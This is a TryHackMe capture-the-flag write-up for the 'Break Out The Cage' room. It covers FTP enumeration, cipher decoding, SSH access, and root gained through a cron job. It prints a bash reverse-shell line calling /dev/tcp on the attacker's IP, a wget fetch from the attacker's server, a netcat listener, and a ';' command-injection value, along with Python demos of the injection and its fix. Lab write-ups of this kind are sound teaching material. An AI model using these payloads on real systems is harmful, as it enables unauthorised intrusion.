Break Out The Cage — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my Break Out The Cage — TryHackMe — WriteUp. Check it out!
First, deploy the machine and scan it with nmap for open ports:
nmap -A -T4 -p- -v <ip>
Well, there are three open ports: 21 (FTP), 22 (SSH) and 80 (HTTP). The scan also shows that anonymous login is allowed on FTP, so let’s start there.
ftp <ip>
Log in as anonymous; when it prompts for a password, just press Enter.
There is a file called “dad_tasks”. Let’s look at its content.
get dad_tasks -
*Remember the “-” at the end: it tells ftp to write the file to stdout, so you can read it directly without saving a copy to your machine.
It looks like some kind of encoded string. We don’t know what it is yet, so leave it for now and move on to the website.
Browse around and you’ll find some useful information:
- a name: Weston
- he’s in “Cage”
- many images
It’s always good to check the page source with Ctrl+U. I checked it, but there was nothing useful. Let’s use dirbuster to find hidden directories.
After a while, I found three interesting directories:
- /scripts: contains the movies’ scripts
- /contracts: contains an empty folder
- /auditions: contains an mp3 file
Let’s first download the mp3 file.
There is some strange noise near the beginning of the mp3. Inspect the spectrogram at that point and you will find a string: namelesstwo.
You can use this website: https://academo.org/demos/spectrum-analyzer/
Now get back to the encoded string we found on FTP. Use https://icyberchef.com to decode it.
After some experimenting, I found that it is Base64-encoded Vigenère ciphertext: decode the Base64 first, then the Vigenère.
Use namelesstwo (the string from the spectrogram) as the key when decoding the Vigenère.
The decoded text contains a password for Weston. That’s our #1 answer.
SSH to the machine as weston with the password above.
Wait a while and a message will appear on the terminal:
Well, now I know there is a cron job running.
Let’s run sudo -l to see what weston can run with sudo:
Weston may run /usr/bin/bees as root. Unfortunately we can’t modify this bees script, so that is not our way up.
To find out what the cron job actually runs, I will use pspy32, a tool that snoops on Linux processes without needing root. You can download it here:
https://github.com/DominicBreuker/pspy
Download pspy32 to your attacking machine, serve it over HTTP with Python, then fetch it from the SSH session with wget.
On your machine, from the directory containing pspy32:
python3 -m http.server 9000
Or if you use python2:
python -m SimpleHTTPServer 9000
Then from the SSH session:
wget http://<your_vpn_ip>:9000/pspy32
Now the file is on the target. Make it executable and run it:
chmod +x pspy32
./pspy32
Wait until the message appears again; pspy32 will log the command that produced it:
Now I know where the script is stored: /opt/.dads_scripts/spread_the_quotes.py
Read the content of this script:
Well, it picks a random line from .quotes and prints it out. We cannot modify the script itself, but we can modify .quotes, and the quote it reads ends up inside a shell command. We will use that to spawn a reverse shell.
cat > /tmp/shell.sh << EOF
#!/bin/bash
bash -i >& /dev/tcp/<your-vpn-ip>/4444 0>&1
EOF
chmod +x /tmp/shell.sh
printf 'anything;/tmp/shell.sh\n' > /opt/.dads_scripts/.files/.quotes
*Note the “;” after the leading text. The quote is inserted into a shell command, so the “;” ends that command and runs /tmp/shell.sh as a second one. Without it, the path would only be passed as an argument to the print command and would be displayed, not executed.
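To make the injection concrete, here is an added example (not the room’s script, which the writeup does not reproduce) of the pattern described above: a random line from a quote file is glued into a shell command string. The real broadcast command is replaced by echo so the example runs anywhere, and the quote lines are constructed for the demo. The hardened form beside it passes the quote as a single argv element, so a “;” in the quote has no effect.

```python
import random
import subprocess

# Constructed sample quote file standing in for /opt/.dads_scripts/.files/.quotes.
# These lines are made up for the example; the room's real quotes are not reproduced.
SAMPLE_QUOTES = [
    "Line one of the quote file",
    "Line two of the quote file",
]


def pick_quote(lines):
    """Mimic the cron job: choose one random line of the quote file."""
    return random.choice(lines).rstrip("\n")


def broadcast_unsafe(quote, cmd="echo"):
    """Vulnerable pattern (assumed to be what spread_the_quotes.py does):
    the quote is concatenated into a command string and handed to a shell.
    'echo' stands in for the real broadcast command so this runs anywhere.
    A ';' inside the quote terminates the echo and starts a second command."""
    completed = subprocess.run(cmd + " " + quote, shell=True,
                               capture_output=True, text=True)
    return completed.stdout


def broadcast_safe(quote, cmd="echo"):
    """Hardened form: argv list and no shell, so the whole quote is one
    literal argument and ';' is just a character."""
    completed = subprocess.run([cmd, quote], capture_output=True, text=True)
    return completed.stdout


def injected_quote(payload):
    """Build the line the writeup puts into .quotes: harmless text, ';', then
    the command to run (in the room, /tmp/shell.sh)."""
    return "anything;" + payload


if __name__ == "__main__":
    line = injected_quote("echo INJECTED")
    print("unsafe:", repr(broadcast_unsafe(line)))          # second command runs
    print("safe:  ", repr(broadcast_safe(line)))            # quote printed literally
    print("no ';':", repr(broadcast_unsafe("/tmp/shell.sh")))  # path is only printed
```

The third call shows why a bare path in .quotes is not enough: without the “;” the script just prints the path.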
Start a listener on your machine:
nc -lvnp 4444
Then wait a while for the cron job to run (2–3 minutes) and you will have the shell.
Now I’m cage. Grab the first flag in his home folder.
Next, let’s get root for the final flag.
There is also a folder called “email_backup” in cage’s home. Let’s see what’s inside.
There are three emails. Read all of them and you will find something interesting in email_3:
What is this string? The word “face” keeps repeating in the email, so let’s try decoding the string with Vigenère and the key face.
Now we can read it. Try to log in as root using the decoded string.
Ping-pong! Now I’m root. Let’s get the final flag.
cd to /root and you will see an email_backup folder. cd into it and read email_2. You will find the flag in it!
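Both decoding steps in this writeup (dad_tasks: Base64, then Vigenère with key namelesstwo; email_3: Vigenère with key face) can be done offline instead of in CyberChef. The script below is an added example, not part of the original writeup; the ciphertext in it is constructed for the demo and is not the room’s real file, so the decoded text is not the answer. Non-letters pass through unchanged and do not advance the key, which is the common convention and what you need for punctuated text.

```python
import base64


def vigenere(text, key, decrypt=False):
    """Vigenère over the Latin alphabet. Letters keep their case; non-letters
    pass through unchanged and do not consume a key position."""
    shifts = [ord(k.upper()) - 65 for k in key if k.isalpha()]
    if not shifts:
        raise ValueError("key needs at least one letter")
    out = []
    ki = 0
    for ch in text:
        if ch.isalpha():
            shift = shifts[ki % len(shifts)]
            if decrypt:
                shift = -shift
            base = 65 if ch.isupper() else 97
            out.append(chr((ord(ch) - base + shift) % 26 + base))
            ki += 1
        else:
            out.append(ch)
    return "".join(out)


def decode_dad_tasks(blob, key):
    """The two-step recipe used for dad_tasks: Base64 first, then Vigenère."""
    return vigenere(base64.b64decode(blob).decode(), key, decrypt=True)


def encode_for_demo(plaintext, key):
    """Inverse recipe, used only to build the constructed sample below."""
    return base64.b64encode(vigenere(plaintext, key).encode()).decode()


# Constructed sample, NOT the room's dad_tasks file.
SAMPLE_PLAINTEXT = "Task one: feed the hamster. Task two: remember the password."
SAMPLE_KEY = "namelesstwo"
SAMPLE_BLOB = encode_for_demo(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    print(decode_dad_tasks(SAMPLE_BLOB, SAMPLE_KEY))
    # email_3 only needs the Vigenère step; replace the argument with the real string:
    print(vigenere("Frtkaa ci gp trmc", "face", decrypt=True))
```

Paste the real dad_tasks content in place of SAMPLE_BLOB and the email_3 string in place of the constructed one; a wrong key produces readable-looking but meaningless letters, so sanity-check the output before trying it as a password.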
The end.
HAPPY HACKING